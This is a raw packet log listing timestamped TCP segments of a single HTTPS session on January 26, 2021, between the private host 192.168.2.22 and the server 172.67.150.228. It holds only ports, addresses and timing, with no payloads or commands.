Jan 26, 2021 21:31:57.194560051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194614887 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194623947 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194628000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194729090 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194768906 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194791079 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194806099 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194813013 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194843054 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194869995 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194881916 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194890976 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194920063 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194936037 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194953918 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194984913 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.195574045 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.195625067 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.195668936 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.195673943 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.195703030 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.195708036 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.195718050 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.195749044 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.195765018 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.195789099 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.195792913 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.195847988 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.196482897 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.196527004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.196542025 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.196573019 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.196609020 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.196611881 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.196620941 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.196652889 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.196655989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.196696043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.196701050 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.196744919 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.197613955 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.197658062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.197683096 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.197698116 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.197704077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.197755098 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.197757959 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.197793961 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.197798014 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.197832108 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.197837114 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.197880983 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.198400021 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.198441029 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.198448896 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.198479891 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.198481083 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.198518991 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.198519945 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.198555946 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.198555946 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.198595047 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.198596001 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.198651075 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.199455976 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.199516058 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.199687958 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.199729919 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.199743986 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.199769020 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.199769020 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.199805021 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.199809074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.199815035 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.199847937 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.199848890 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.199877024 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.199889898 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.200319052 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.200360060 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.200361967 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.200397015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.200403929 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.200438976 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.200444937 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.200480938 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.200493097 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.200530052 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.200536013 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.200572014 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.201237917 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.201280117 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.201282978 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.201320887 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.201320887 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.201358080 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.201360941 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.201426983 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.201436043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.201478004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.201481104 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.201517105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.205750942 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.206393957 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.206413031 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.206432104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.206439018 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.206449032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.206453085 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.206466913 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.206471920 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.206480026 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.206491947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.206501007 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.206525087 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.206882954 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.206917048 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339406967 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339427948 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339443922 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339459896 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339476109 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339485884 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339492083 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339507103 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339510918 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339525938 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339816093 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339833975 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339850903 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339855909 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339864016 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339873075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339884043 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339890003 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339899063 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339910984 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.339911938 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.339943886 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.340843916 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.340861082 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.340889931 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.340890884 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.340900898 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.340907097 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.340914965 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.340924025 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.340939999 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.340939999 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.340954065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.340969086 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.341744900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.341763973 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.341779947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.341779947 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.341798067 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.341800928 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.341808081 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.341820955 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.341830969 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.341839075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.341845989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.341871977 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.342668056 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.342689037 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.342701912 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.342705965 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.342717886 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.342722893 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.342734098 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.342740059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.342746973 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.342760086 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.342767000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.342788935 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.343605995 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.343622923 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.343642950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.343643904 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.343658924 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.343662977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.343672037 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.343679905 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.343687057 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.343698978 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.343708038 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.343722105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.344703913 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.344722033 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.344739914 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.344742060 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.344758034 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.344760895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.344767094 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.344777107 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.344788074 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.344793081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.344801903 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.344814062 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.345057964 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.345526934 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.345546007 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.345558882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.345561028 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.345572948 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.345578909 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.345587015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.345602989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.345618963 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.345634937 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.345647097 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.345662117 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.346467972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.346484900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.346499920 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.346502066 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.346515894 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.346517086 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.346528053 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.346534967 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.346541882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.346551895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.346565008 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.346580029 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.347400904 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.347419024 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.347435951 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.347435951 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.347451925 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.347453117 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.347461939 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.347470045 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.347485065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.347486019 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.347498894 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.347515106 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.348398924 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.348412037 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.348433971 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.348444939 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.350490093 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.394483089 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.394529104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.394603968 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.398477077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.398525953 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.398564100 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.398626089 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.398654938 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.399003983 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.399051905 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.399081945 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.399112940 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.399416924 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.399486065 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.399662971 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.399725914 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.399909019 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.399959087 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.399976969 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.400206089 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.400373936 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.400438070 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.400629044 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.400702000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.400883913 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.400952101 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.401122093 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.401187897 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.403717995 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.403789043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.403796911 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.403829098 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.403832912 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.403867006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.403870106 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.403903961 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.403909922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.403948069 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.403951883 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.403994083 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.403994083 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404031038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404041052 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404069901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404073954 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404108047 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404112101 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404144049 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404155016 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404184103 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404186010 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404222012 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404225111 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404253960 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404269934 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404310942 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404311895 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404347897 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404357910 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404385090 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404386044 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404422998 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404433012 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404457092 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404462099 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404500961 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404504061 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404531956 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404539108 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404578924 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404587030 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404628992 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404629946 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404656887 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404664993 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404704094 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404706955 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404743910 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404747009 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404779911 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404783964 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404817104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404820919 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404854059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404859066 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404884100 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404901028 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404942036 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.404943943 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404969931 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.404978037 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405014992 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405025005 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.405061007 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405066967 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.405098915 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.405109882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.405144930 CET	49167	443	192.168.2.22	172.67.150.228
